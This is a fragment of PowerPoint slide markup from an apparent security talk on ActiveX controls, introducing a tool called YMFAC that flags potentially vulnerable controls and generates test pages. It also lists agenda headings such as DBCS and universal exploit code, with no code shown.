                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody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US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2846370" y="2351871"/>
            <a:ext cx="5357850" cy="1785950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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en-US" sz="2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굴림" pitchFamily="50" charset="-127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B3EDC38-0788-4C97-8A49-6413745B9D56}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296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ko-KR" dirty="0" smtClean="0"/>
              <a:t>YMFAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(You Must Fortify ActiveX Control)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2970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ko-KR" dirty="0" smtClean="0"/>
              <a:t>We developed YMFAC to identify potentially vulnerable ActiveX controls installed by an application or during web surfing</a:t>
            </a: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70160" y="2390003"/>
            <a:ext cx="8077200" cy="453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" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131726" y="2351871"/>
            <a:ext cx="2000264" cy="1143008"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 91658"/>
              <a:gd name="adj2" fmla="val 50339"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Potentially vulnerable ActiveX control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="사각형 설명선 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131726" y="4352135"/>
            <a:ext cx="2000264" cy="1143008"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 91658"/>
              <a:gd name="adj2" fmla="val 50339"/>
            </a:avLst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  <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>Little   vulnerable ActiveX control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93F5CA2-C1B0-4353-B2DC-5C61561FE073}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Automatic Generation of Test Web Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody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ko-KR" dirty="0" smtClean="0"/>
              <a:t>YMFAC creates web pages to inspect ActiveX controls manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean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46370" y="2423308"/>
            <a:ext cx="4714908" cy="37502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AB73619-C0CF-4AA5-B112-DB15EA52DEEA}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3379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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Test Web Page</a:t>
            </a:r>
          </a:p>
        </p:txBody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ko-KR" dirty="0" smtClean="0"/>
              <a:t>YMFAC discloses the addresses of methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/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74800" y="2208995"/>
            <a:ext cx="7496175" cy="393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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4B0D3007-87A9-4038-9BA7-87957B0E7829}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011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ko-KR" dirty="0" smtClean="0"/>
              <a:t>3 DBCS and Universal Exploit Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012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/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="1954213"/>
            <a:ext cx="5446712" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449337" tIns="45654" rIns="91306" bIns="45654" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Introduction to ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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43014" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="2889250"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12796"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Potentially Vulnerable Control Identification</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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861190" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="1809750"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861191" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="2733675"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43021" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="5842000"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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861197" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="5686425"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2397125" y="3897313"/>
            <a:ext cx="6407150" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="114B51"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="25A2AF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="114B51"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DBCS and Universal Exploit Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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16" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1889125" y="3741738"/>
            <a:ext cx="801688" cy="757237"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="hlink"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="4833938"/>
            <a:ext cx="5446712" cy="439737"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Windows Vista and ActiveX Control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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18" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="4667250"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{03F499E6-D2EE-4075-B0AA-6E87AB5ADEC2}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Typical Korean Users and ActiveX Controls</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292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 lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1131858" y="5708056"/>
            <a:ext cx="7572428" cy="1001533"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200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OS</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="75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131858" y="4850800"/>
            <a:ext cx="7572428" cy="1001533"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200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App</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75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632056" y="5872273"/>
            <a:ext cx="5786478" cy="765878"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="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Windows   : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"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200~300</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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632056" y="5015017"/>
            <a:ext cx="2786082" cy="765878"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="0"/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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="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MS Office 2007 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="6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60+</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60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489576" y="5015017"/>
            <a:ext cx="2928958" cy="765878"/>
          </a:xfrm>
